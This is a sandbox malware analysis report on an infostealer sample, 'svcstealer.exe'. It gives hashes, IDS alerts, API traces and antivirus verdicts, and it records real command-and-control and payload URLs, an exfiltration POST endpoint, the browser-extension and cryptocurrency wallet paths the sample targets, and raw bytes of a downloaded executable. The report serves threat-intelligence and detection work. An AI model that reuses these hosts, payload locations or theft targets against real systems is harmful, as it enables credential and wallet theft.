Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	April 26, 2025, 2:20 p.m.	April 26, 2025, 2:24 p.m.

Size	1.2MB
Type	PE32+ executable (GUI) x86-64, for MS Windows
MD5	`763ba270b3a70837d7934e6a7fd5d8be`
SHA256	`d954b8d3e0481a3d9b5c3c6342af84ebf619bc07d3020188222e6d225cc505e7`
CRC32	`1DC37D94`
ssdeep	`24576:8dDEllSAUzNwP9b1UcX1rX+O4k+rUPnKH:8xEllqaP9DrX+sK`
Yara	PE_Header_Zero - PE File Signature IsPE64 - (no description) infoStealer_browser_b_Zero - browser info stealer Malicious_Library_Zero - Malicious_Library Generic_Malware_Zero - Generic Malware OS_Processor_Check_Zero - OS Processor Check UPX_Zero - UPX packed file

svcstealer.exe "C:\Users\test22\AppData\Local\Temp\svcstealer.exe"
1208
- temp_16958.exe "C:\Users\test22\AppData\Local\Temp\temp_16958.exe"
  2516

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
185.39.17.158	Active	Moloch
80.64.16.35	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.103:49173 -> 80.64.16.35:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.103:49173 -> 80.64.16.35:80	2019714	ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile	Potentially Bad Traffic
TCP 192.168.56.103:49163 -> 185.39.17.158:80	2061022	ET MALWARE SvcStealer Data Exfiltration Attempt	A Network Trojan was detected
TCP 80.64.16.35:80 -> 192.168.56.103:49173	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 80.64.16.35:80 -> 192.168.56.103:49173	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 192.168.56.103:49164 -> 185.39.17.158:80	2061021	ET MALWARE SvcStealer CNC Tasking Checkin	A Network Trojan was detected

Suricata TLS

No Suricata TLS

Queries for the computername (3 events)

Time & API	Arguments	Status	Return
GetComputerNameW April 26, 2025, 2:13 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 26, 2025, 2:13 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 26, 2025, 2:13 p.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (1 event)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent April 26, 2025, 2:13 p.m.			0	0

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx April 26, 2025, 2:13 p.m.		1	1	0

HTTP traffic contains suspicious features which may be indicative of malware related traffic (2 events)

suspicious_features	POST method with no referer header, Connection to IP address				suspicious_request	POST http://185.39.17.158/svcstealer/get.php
suspicious_features	Connection to IP address				suspicious_request	GET http://80.64.16.35/fgg.exe

Performs some HTTP requests (2 events)

request	POST http://185.39.17.158/svcstealer/get.php
request	GET http://80.64.16.35/fgg.exe

Sends data using the HTTP POST Method (1 event)

request

POST http://185.39.17.158/svcstealer/get.php

Steals private information from local Internet browsers (15 events)

file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp\
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nphplpgoakhhjchkkhmiggakijnkhfnd\
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd\
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph\
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec\
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kgdijkcfiglijhaglibaidbipiejjfdp\
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfchfdkjhcoekhdldggegebfakaaiog\
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local State
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ckklhkaabbmdjkahiaaplikpdddkenic\
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oafedfoadhdjjcipmcbecikgokpaphjk\
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnlhokffphohmfcddnibpohmkdfafdli\
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfogiafebfohielmmehodmfbbebbbpei\
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn\
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge\
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa\

Creates executable files on the filesystem (1 event)

file	C:\Users\test22\AppData\Local\Temp\temp_16958.exe

Searches running processes potentially to identify processes for sandbox evasion, code injection or memory dumping (6 events)

Time & API	Arguments	Status	Return
Process32NextW April 26, 2025, 2:13 p.m.	snapshot_handle: 0x00000000000000b8 process_name: SearchProtocolHost.exe process_identifier: 940	1	1
Process32NextW April 26, 2025, 2:13 p.m.	snapshot_handle: 0x00000000000000b8 process_name: svcstealer.exe process_identifier: 1208	1	1
Process32NextW April 26, 2025, 2:13 p.m.	snapshot_handle: 0x00000000000000b8 process_name: conhost.exe process_identifier: 800	1	1
Process32NextW April 26, 2025, 2:13 p.m.	snapshot_handle: 0x0000000000000164 process_name: process_identifier: 1070279616		0
Process32NextW April 26, 2025, 2:13 p.m.	snapshot_handle: 0x0000000000000310 process_name: sppsvc.exe process_identifier: 2440	1	1
Process32NextW April 26, 2025, 2:13 p.m.	snapshot_handle: 0x00000000000003cc process_name: temp_16958.exe process_identifier: 2516	1	1

An executable file was downloaded by the process svcstealer.exe (1 event)

Time & API	Arguments	Status	Return	Repeated
InternetReadFile April 26, 2025, 2:13 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $ÍFo'û<'û<'û<Â_ø='û<Â_þ=''û<Â_ÿ='û<J¤ø='û<J¤ÿ='û<Â_ú='û<'ú<ï'û<J¤þ=Ø'û<£ò='û<£ù='û<Rich'û<PEdN hð"( dÀ@0`<«<ðü$ ô 0b8ð`@°Ð.text¼ `.rdataª°¤@@.dataT-Àª@À.pdataü$ð&À@@.relocô æ@BHÄHXHpUWATAVAWHl$Hì)pÈWÀD$PWÉfL$`¿DÇH HHL$PèÓ[WÀD$pWÉfM_DÃH½GHL$pè«[WÀEWÉfM DÇHíGHMè[WÀE°WÉfMÀDG'HGHM°èd[WÀEÐWÉfMàDÇHÎGHMÐèA[WÀEðWÉfMDÃHGHMðè[WÀEWÉfM DÇH°GHMèûZWÀE0WÉfM@DÃHiGHM0èØZH%×ÛH%×ÛO]èéLàHH@H@fÇ@H¬ÛH]H=¡ÛLsÈMÎMÄHUPè¶}0ò@òD$@\|$@ÎH¸ªªªªªªªH9lÛL=WÛH\|$ Hd$(¹`èéHøHD$(Hp Hµ°WÀHfHfH{àvM6LCØIÖHÎè¾ZHN WÀHaHaHSèH;vHLCøèZL?LLfgHd$(ót$0LÇHT$0H=¯ÚHÏèbHÃ@HCÈHMPH;ÁñþÿÿL Kº@DBÄHL$PètèH ùL$I[8Is@A(sðIãA_A^A\_]é@ëèóÌÌH\$Ht$UWAVH¬$ÿÿÿHìð3ÿH}HE HDwAÎèÊ×HE¸HM°èé\HE HM°è RHE¨LÐEHEHMèÍVLEHíDHMÐèpSH\|$pHD$xHAÎèf×HEHMè\HD$xHMè;RHELEHiEHL$pègVLD$pH¶DHMè SH\|$HHD$PHAÎèÿÖHD$hHL$`è\HD$PHL$`èÑQHD$XLFEHEHL$HèüULD$HHsDHM`èRH\|$ HD$(HAÎèÖHD$@HL$8è±[HD$(HL$8èfQHD$0L EHÛDHL$ èULD$ H0DH¨è0RHEÐHEÀHðHEÈ(EÀfEÀHUÀèfCL ¶WHDGHMÐè>æÎÿHL$ HÉt,ÆðÁA,Æu!H\$ ëHËHCHH8HAÖÿHÛuæH\|$ HL$@HÉtHÿPHÀtHLAÖHÈAÿÐHL$HHÉt,ÆðÁA,Æu!H\$HëHËHCHH8HAÖÿHÛuæH\|$HHL$hHÉtHÿPHÀtHLAÖHÈAÿÐHL$pHÉt,ÆðÁA,Æu!H\$pëHËHCHH8HAÖÿHÛuæH\|$pHMHÉtHÿPHÀtHLAÖHÈAÿÐHMHÉt+ÆðÁA,Æu H]ëHËHCHH8HAÖÿHÛuæH}HM¸HÉtHÿPHÀtLAÖHÈAÿH TL$ðI[(Is0IãA^_]éçHì(H Á¾èLÎH -HÄ(éxçH élçH é`çHì(H ÁèÎH ÝHÄ(é@çH é4çÌÌÌÌÌÌÌÌ@SHì HÙHÂH õWÀHHSHHè#HÃHÄ [ÃÌÌHyH@HEAÃÌÌH\$WHì H¯HùHÚHÁèröÃt ºHÏètãH\$0HÇHÄ _ÃÌÌHuHHÁé=ÌHaHÄ?HAH ²HHÁÃÌÌHìHHL$ èÒÿÿÿH[HL$ è1Ì@SHì HÙHÂH WÀHHSHHèCH°±HHÃHÄ [Ã@SHì HÙHÂH ÙWÀHHSHHèHÔHHÃHÄ [ÃHì(H'HHPøH+ÂHÀøHøwHHÄ(Ãè_\ÌÌÌHì(H ù>èTÐÌÌÌÌ@SHì@H+¨H3ÄHD$0HzLÂHÙvLHQLD$ H;ÆD$(HWÀHL$ ègÿHHHÃHL$0H3ÌèÑáHÄ@[ÃÌÌÌ@SHì HÙHÂH íWÀHHSHHèÿH@HHÃHÄ [ÃDHÂHJÃÌ@SHì0HIØDÂHT$ ÿPHKLHHQI9Qu 9u°ë2ÀHÄ0[ÃÌHBLHL9IuD9u°Ã2ÀÃÌÌÌHA³HAHÁÃÌÌÌLD$HL$SVWHì`Hü¦H3ÄHD$PIØHòHùHL$HH\$HIxtA¸H=HËè HHNHDHT$(ÿPHT$(¾H9t$@HGT$(LD$8HËèÔGHT$@H;Öv.HÿÂHL$(HÁHúrHÂ'HIøH+ÁHÀøHøwSèwàWÀHgHgKOHcHsÆHcHsÆHÇHL$PH3ÌèàHÄ`_^[ÃèZÌÌÌ@USWHìHìpHM°IÀHeÐWÀHeØHúM@HÙHxEÀvHHÐHMÀèÝQLEÀHU°HMàóE°èþÿÿHÐHËèaýÿÿHUøHúv-HMàHÿÂHÁHúrHIøHÂ'H+ÁHÀøHøw"èßH0°HHÃóCHÄp_[]ÃèPYÌÌÌÌH\$WHì HcHùHÚHÁè&ýöÃt º(HÏè(ßH\$0HÇHÄ _ÃÌÌH\$ WHìPIÀHúHÙHL$ WÀD$0WÉóL$@IÈÿIÿÀB<uöH request_handle: 0x0000000000cc0024	1	1	0

Repeatedly searches for a not-found process, you may want to run a web browser during analysis (50 out of 55 events)

Time & API	Arguments	Status	Return	Repeated
Process32NextW April 26, 2025, 2:13 p.m.	snapshot_handle: 0x00000000000000b8 process_name: pw.exe process_identifier: 1028		0	0
Process32NextW April 26, 2025, 2:13 p.m.	snapshot_handle: 0x00000000000000b8 process_name: pw.exe process_identifier: 1028		0	0
Process32NextW April 26, 2025, 2:13 p.m.	snapshot_handle: 0x00000000000000b8 process_name: pw.exe process_identifier: 1028		0	0
Process32NextW April 26, 2025, 2:13 p.m.	snapshot_handle: 0x00000000000000b8 process_name: pw.exe process_identifier: 1028		0	0
Process32NextW April 26, 2025, 2:13 p.m.	snapshot_handle: 0x000000000000019c process_name: pw.exe process_identifier: 1028		0	0
Process32NextW April 26, 2025, 2:13 p.m.	snapshot_handle: 0x000000000000019c process_name: pw.exe process_identifier: 1028		0	0
Process32NextW April 26, 2025, 2:13 p.m.	snapshot_handle: 0x000000000000019c process_name: pw.exe process_identifier: 1028		0	0
Process32NextW April 26, 2025, 2:13 p.m.	snapshot_handle: 0x000000000000019c process_name: pw.exe process_identifier: 1028		0	0
Process32NextW April 26, 2025, 2:13 p.m.	snapshot_handle: 0x0000000000000164 process_name: process_identifier: 1070279616		0	0
Process32NextW April 26, 2025, 2:13 p.m.	snapshot_handle: 0x00000000000001fc process_name: WmiPrvSE.exe process_identifier: 2096		0	0
Process32NextW April 26, 2025, 2:13 p.m.	snapshot_handle: 0x00000000000001fc process_name: WmiPrvSE.exe process_identifier: 2096		0	0
Process32NextW April 26, 2025, 2:13 p.m.	snapshot_handle: 0x00000000000001fc process_name: WmiPrvSE.exe process_identifier: 2096		0	0
Process32NextW April 26, 2025, 2:13 p.m.	snapshot_handle: 0x00000000000002f8 process_name: WmiPrvSE.exe process_identifier: 2096		0	0
Process32NextW April 26, 2025, 2:13 p.m.	snapshot_handle: 0x00000000000002f8 process_name: WmiPrvSE.exe process_identifier: 2096		0	0
Process32NextW April 26, 2025, 2:13 p.m.	snapshot_handle: 0x00000000000002f8 process_name: WmiPrvSE.exe process_identifier: 2096		0	0
Process32NextW April 26, 2025, 2:13 p.m.	snapshot_handle: 0x0000000000000300 process_name: WmiPrvSE.exe process_identifier: 2096		0	0
Process32NextW April 26, 2025, 2:13 p.m.	snapshot_handle: 0x0000000000000300 process_name: WmiPrvSE.exe process_identifier: 2096		0	0
Process32NextW April 26, 2025, 2:13 p.m.	snapshot_handle: 0x0000000000000300 process_name: WmiPrvSE.exe process_identifier: 2096		0	0
Process32NextW April 26, 2025, 2:13 p.m.	snapshot_handle: 0x0000000000000300 process_name: WmiPrvSE.exe process_identifier: 2096		0	0
Process32NextW April 26, 2025, 2:13 p.m.	snapshot_handle: 0x00000000000000cc process_name: WmiPrvSE.exe process_identifier: 2096		0	0
Process32NextW April 26, 2025, 2:13 p.m.	snapshot_handle: 0x00000000000000cc process_name: WmiPrvSE.exe process_identifier: 2096		0	0
Process32NextW April 26, 2025, 2:13 p.m.	snapshot_handle: 0x00000000000000cc process_name: WmiPrvSE.exe process_identifier: 2096		0	0
Process32NextW April 26, 2025, 2:13 p.m.	snapshot_handle: 0x00000000000000cc process_name: WmiPrvSE.exe process_identifier: 2096		0	0
Process32NextW April 26, 2025, 2:13 p.m.	snapshot_handle: 0x00000000000000cc process_name: WmiPrvSE.exe process_identifier: 2096		0	0
Process32NextW April 26, 2025, 2:13 p.m.	snapshot_handle: 0x00000000000000cc process_name: WmiPrvSE.exe process_identifier: 2096		0	0
Process32NextW April 26, 2025, 2:13 p.m.	snapshot_handle: 0x00000000000000cc process_name: WmiPrvSE.exe process_identifier: 2096		0	0
Process32NextW April 26, 2025, 2:13 p.m.	snapshot_handle: 0x00000000000000cc process_name: WmiPrvSE.exe process_identifier: 2096		0	0
Process32NextW April 26, 2025, 2:13 p.m.	snapshot_handle: 0x0000000000000304 process_name: WmiPrvSE.exe process_identifier: 2096		0	0
Process32NextW April 26, 2025, 2:13 p.m.	snapshot_handle: 0x0000000000000304 process_name: WmiPrvSE.exe process_identifier: 2096		0	0
Process32NextW April 26, 2025, 2:13 p.m.	snapshot_handle: 0x0000000000000304 process_name: WmiPrvSE.exe process_identifier: 2096		0	0
Process32NextW April 26, 2025, 2:13 p.m.	snapshot_handle: 0x0000000000000304 process_name: WmiPrvSE.exe process_identifier: 2096		0	0
Process32NextW April 26, 2025, 2:13 p.m.	snapshot_handle: 0x0000000000000304 process_name: WmiPrvSE.exe process_identifier: 2096		0	0
Process32NextW April 26, 2025, 2:13 p.m.	snapshot_handle: 0x0000000000000304 process_name: WmiPrvSE.exe process_identifier: 2096		0	0
Process32NextW April 26, 2025, 2:13 p.m.	snapshot_handle: 0x0000000000000304 process_name: WmiPrvSE.exe process_identifier: 2096		0	0
Process32NextW April 26, 2025, 2:13 p.m.	snapshot_handle: 0x0000000000000304 process_name: WmiPrvSE.exe process_identifier: 2096		0	0
Process32NextW April 26, 2025, 2:13 p.m.	snapshot_handle: 0x0000000000000304 process_name: svchost.exe process_identifier: 2320		0	0
Process32NextW April 26, 2025, 2:13 p.m.	snapshot_handle: 0x0000000000000304 process_name: svchost.exe process_identifier: 2320		0	0
Process32NextW April 26, 2025, 2:13 p.m.	snapshot_handle: 0x0000000000000304 process_name: svchost.exe process_identifier: 2320		0	0
Process32NextW April 26, 2025, 2:13 p.m.	snapshot_handle: 0x0000000000000304 process_name: svchost.exe process_identifier: 2320		0	0
Process32NextW April 26, 2025, 2:13 p.m.	snapshot_handle: 0x0000000000000310 process_name: sppsvc.exe process_identifier: 2440		0	0
Process32NextW April 26, 2025, 2:13 p.m.	snapshot_handle: 0x0000000000000310 process_name: sppsvc.exe process_identifier: 2440		0	0
Process32NextW April 26, 2025, 2:13 p.m.	snapshot_handle: 0x0000000000000310 process_name: sppsvc.exe process_identifier: 2440		0	0
Process32NextW April 26, 2025, 2:13 p.m.	snapshot_handle: 0x0000000000000310 process_name: sppsvc.exe process_identifier: 2440		0	0
Process32NextW April 26, 2025, 2:13 p.m.	snapshot_handle: 0x0000000000000310 process_name: sppsvc.exe process_identifier: 2440		0	0
Process32NextW April 26, 2025, 2:13 p.m.	snapshot_handle: 0x0000000000000310 process_name: sppsvc.exe process_identifier: 2440		0	0
Process32NextW April 26, 2025, 2:13 p.m.	snapshot_handle: 0x0000000000000310 process_name: sppsvc.exe process_identifier: 2440		0	0
Process32NextW April 26, 2025, 2:13 p.m.	snapshot_handle: 0x0000000000000310 process_name: sppsvc.exe process_identifier: 2440		0	0
Process32NextW April 26, 2025, 2:13 p.m.	snapshot_handle: 0x0000000000000328 process_name: sppsvc.exe process_identifier: 2440		0	0
Process32NextW April 26, 2025, 2:13 p.m.	snapshot_handle: 0x0000000000000328 process_name: sppsvc.exe process_identifier: 2440		0	0
Process32NextW April 26, 2025, 2:13 p.m.	snapshot_handle: 0x0000000000000328 process_name: sppsvc.exe process_identifier: 2440		0	0

Executes one or more WMI queries which can be used to identify virtual machines (1 event)

wmi	SELECT * FROM Win32_BIOS

Communicates with host for which no DNS query was performed (2 events)

host	185.39.17.158
host	80.64.16.35

Attempts to access Bitcoin/ALTCoin wallets (4 events)

file	C:\Users\test22\AppData\Roaming\Bitcoin\
file	C:\ProgramData\65EDB51284023538805469\Wallets\Bitcoin\
file	C:\Users\test22\AppData\Roaming\Electrum\wallets\
file	C:\ProgramData\65EDB51284023538805469\Wallets\Electrum\

Drops a binary and executes it (1 event)

file	C:\Users\test22\AppData\Local\Temp\temp_16958.exe

Executes one or more WMI queries (2 events)

wmi	SELECT * FROM AntiVirusProduct
wmi	SELECT * FROM Win32_BIOS

File has been identified by 50 AntiVirus engines on VirusTotal as malicious (50 events)

Lionic	Trojan.Win32.Stealer.12!c
Cynet	Malicious (score: 99)
CAT-QuickHeal	Trojan.Ghanarava.1745624472d5d8be
ALYac	Gen:Variant.Lazy.657986
Cylance	Unsafe
Sangfor	Spyware.Win32.Lazy.Vskc
CrowdStrike	win/malicious_confidence_100% (W)
BitDefender	Gen:Variant.Lazy.657986
K7GW	Spyware ( 005bffa41 )
K7AntiVirus	Spyware ( 005bffa41 )
Arcabit	Trojan.Lazy.DA0A42
VirIT	Trojan.Win32.GenusT.EVUF
Symantec	ML.Attribute.HighConfidence
Elastic	malicious (high confidence)
ESET-NOD32	a variant of Win64/Spy.Agent.ML
Avast	Win64:Evo-gen [Trj]
Kaspersky	Trojan-Spy.Win32.Stealer.flrd
Alibaba	TrojanSpy:Win64/Nekark.87900a44
MicroWorld-eScan	Gen:Variant.Lazy.657986
Rising	Stealer.OskiStealer!1.C41E (CLASSIC)
Emsisoft	Gen:Variant.Lazy.657986 (B)
F-Secure	Trojan.TR/AD.Nekark.qqbgt
DrWeb	Trojan.Siggen31.14557
VIPRE	Gen:Variant.Lazy.657986
McAfeeD	ti!D954B8D3E048
CTX	exe.trojan.lazy
Sophos	Mal/Generic-S
SentinelOne	Static AI - Malicious PE
Webroot	Win.Malware.Gen
Google	Detected
Avira	TR/AD.Nekark.qqbgt
Antiy-AVL	Trojan[Spy]/Win32.Stealer
Kingsoft	malware.kb.a.739
Gridinsoft	Spy.Win64.Keylogger.sa
Microsoft	Trojan:Win32/Kepavll!rfn
ViRobot	Trojan.Win.Z.Lazy.1242624.A
GData	Gen:Variant.Lazy.657986
Varist	W64/ABTrojan.OEER-2067
AhnLab-V3	Trojan/Win.Generic.R698804
McAfee	Artemis!763BA270B3A7
DeepInstinct	MALICIOUS
Malwarebytes	Malware.AI.3964926470
Panda	Trj/GdSda.A
TrendMicro-HouseCall	TROJ_GEN.R002H09DE25
Tencent	Malware.Win32.Gencirc.146a07b9
huorong	TrojanSpy/Stealer.ot
Fortinet	W64/Agent.ML!tr
AVG	Win64:Evo-gen [Trj]
Paloalto	generic.ml
alibabacloud	Trojan[spy]:Win/Lazy.Gen

svcstealer.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All